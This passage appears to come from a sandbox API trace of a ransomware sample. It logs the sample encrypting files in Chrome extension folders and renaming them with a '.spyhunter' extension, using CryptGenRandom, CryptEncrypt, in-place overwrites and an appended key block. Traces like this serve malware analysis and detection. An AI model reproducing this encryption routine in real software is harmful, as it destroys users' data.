lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.954] WriteFile (in: hFile=0x188, lpBuffer=0x248f594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f554, lpOverlapped=0x0 | out: lpBuffer=0x248f594*, lpNumberOfBytesWritten=0x248f554*=0x4, lpOverlapped=0x0) returned 1 [0136.955] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f554, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f554*=0x30, lpOverlapped=0x0) returned 1 [0136.955] CloseHandle (hObject=0x188) returned 1 [0136.955] GetProcessHeap () returned 0x2c0000 [0136.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.955] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.spyhunter") returned 165 [0136.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0136.955] GetProcessHeap () returned 0x2c0000 [0136.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.956] GetProcessHeap () returned 0x2c0000 [0136.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.956] GetProcessHeap () returned 0x2c0000 [0136.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9060 | out: hHeap=0x2c0000) returned 1 [0136.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f590 | out: pbBuffer=0x248f590) returned 1 [0136.957] GetProcessHeap () returned 0x2c0000 [0136.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f588*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f588*=0x30) returned 1 [0136.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.957] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0136.957] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.957] GetProcessHeap () returned 0x2c0000 [0136.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.957] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f54c*=0x16a, lpOverlapped=0x0) returned 1 [0136.958] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.958] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x248f54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f54c*=0x16a, lpOverlapped=0x0) returned 1 [0136.958] GetProcessHeap () returned 0x2c0000 [0136.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.958] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.958] WriteFile (in: hFile=0x188, lpBuffer=0x248f58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f54c, lpOverlapped=0x0 | out: lpBuffer=0x248f58c*, lpNumberOfBytesWritten=0x248f54c*=0x4, lpOverlapped=0x0) returned 1 [0136.959] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f54c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f54c*=0x30, lpOverlapped=0x0) returned 1 [0136.959] CloseHandle (hObject=0x188) returned 1 [0136.959] GetProcessHeap () returned 0x2c0000 [0136.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.959] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.spyhunter") returned 165 [0136.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.spyhunter")) returned 1 [0136.959] GetProcessHeap () returned 0x2c0000 [0136.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.960] GetProcessHeap () returned 0x2c0000 [0136.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.960] GetProcessHeap () returned 0x2c0000 [0136.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8d50 | out: hHeap=0x2c0000) returned 1 [0136.961] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f588 | out: pbBuffer=0x248f588) returned 1 [0136.961] GetProcessHeap () returned 0x2c0000 [0136.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.961] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f580*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f580*=0x30) returned 1 [0136.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0136.961] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.961] GetProcessHeap () returned 0x2c0000 [0136.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.961] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f544, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f544*=0xb6, lpOverlapped=0x0) returned 1 [0136.962] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.962] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x248f544, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f544*=0xb6, lpOverlapped=0x0) returned 1 [0136.962] GetProcessHeap () returned 0x2c0000 [0136.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.962] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.963] WriteFile (in: hFile=0x188, lpBuffer=0x248f584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f544, lpOverlapped=0x0 | out: lpBuffer=0x248f584*, lpNumberOfBytesWritten=0x248f544*=0x4, lpOverlapped=0x0) returned 1 [0136.963] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f544, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f544*=0x30, lpOverlapped=0x0) returned 1 [0136.963] CloseHandle (hObject=0x188) returned 1 [0136.963] GetProcessHeap () returned 0x2c0000 [0136.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.963] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.spyhunter") returned 165 [0136.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0136.964] GetProcessHeap () returned 0x2c0000 [0136.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.964] GetProcessHeap () returned 0x2c0000 [0136.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.964] GetProcessHeap () returned 0x2c0000 [0136.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8a40 | out: hHeap=0x2c0000) returned 1 [0137.433] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f580 | out: pbBuffer=0x248f580) returned 1 [0137.433] GetProcessHeap () returned 0x2c0000 [0137.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.433] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f578*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f578*=0x30) returned 1 [0137.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.447] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0137.447] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.447] GetProcessHeap () returned 0x2c0000 [0137.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.447] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f53c*=0x25f, lpOverlapped=0x0) returned 1 [0137.453] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffda1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.453] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x248f53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f53c*=0x25f, lpOverlapped=0x0) returned 1 [0137.453] GetProcessHeap () returned 0x2c0000 [0137.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.453] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.454] WriteFile (in: hFile=0x178, lpBuffer=0x248f57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f53c, lpOverlapped=0x0 | out: lpBuffer=0x248f57c*, lpNumberOfBytesWritten=0x248f53c*=0x4, lpOverlapped=0x0) returned 1 [0137.454] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f53c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f53c*=0x30, lpOverlapped=0x0) returned 1 [0137.454] CloseHandle (hObject=0x178) returned 1 [0137.454] GetProcessHeap () returned 0x2c0000 [0137.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0137.454] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.spyhunter") returned 165 [0137.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.spyhunter")) returned 1 [0137.455] GetProcessHeap () returned 0x2c0000 [0137.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0137.455] GetProcessHeap () returned 0x2c0000 [0137.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.455] GetProcessHeap () returned 0x2c0000 [0137.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc77e0 | out: hHeap=0x2c0000) returned 1 [0137.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f570 | out: pbBuffer=0x248f570) returned 1 [0137.501] GetProcessHeap () returned 0x2c0000 [0137.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.501] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f568*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f568*=0x30) returned 1 [0137.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0137.502] StrStrW (lpFirst="craw_window.css", lpSrch=".txt") returned 0x0 [0137.502] GetProcessHeap () returned 0x2c0000 [0137.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.502] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f52c*=0x6cd, lpOverlapped=0x0) returned 1 [0137.512] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff933, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.512] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x6cd, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f52c*=0x6cd, lpOverlapped=0x0) returned 1 [0137.512] GetProcessHeap () returned 0x2c0000 [0137.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.512] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.513] WriteFile (in: hFile=0x178, lpBuffer=0x248f56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x248f56c*, lpNumberOfBytesWritten=0x248f52c*=0x4, lpOverlapped=0x0) returned 1 [0137.513] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f52c*=0x30, lpOverlapped=0x0) returned 1 [0137.513] CloseHandle (hObject=0x178) returned 1 [0137.513] GetProcessHeap () returned 0x2c0000 [0137.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0137.513] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.spyhunter") returned 163 [0137.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.spyhunter")) returned 1 [0137.514] GetProcessHeap () returned 0x2c0000 [0137.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0137.514] GetProcessHeap () returned 0x2c0000 [0137.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.514] GetProcessHeap () returned 0x2c0000 [0137.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0137.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f570 | out: pbBuffer=0x248f570) returned 1 [0137.515] GetProcessHeap () returned 0x2c0000 [0137.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f568*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f568*=0x30) returned 1 [0137.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0137.515] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0137.515] GetProcessHeap () returned 0x2c0000 [0137.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.516] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f52c*=0x52a, lpOverlapped=0x0) returned 1 [0137.530] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffad6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.530] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x52a, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f52c*=0x52a, lpOverlapped=0x0) returned 1 [0137.530] GetProcessHeap () returned 0x2c0000 [0137.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.530] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.530] WriteFile (in: hFile=0x178, lpBuffer=0x248f56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x248f56c*, lpNumberOfBytesWritten=0x248f52c*=0x4, lpOverlapped=0x0) returned 1 [0137.530] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f52c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f52c*=0x30, lpOverlapped=0x0) returned 1 [0137.531] CloseHandle (hObject=0x178) returned 1 [0137.531] GetProcessHeap () returned 0x2c0000 [0137.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.531] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.spyhunter") returned 157 [0137.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js 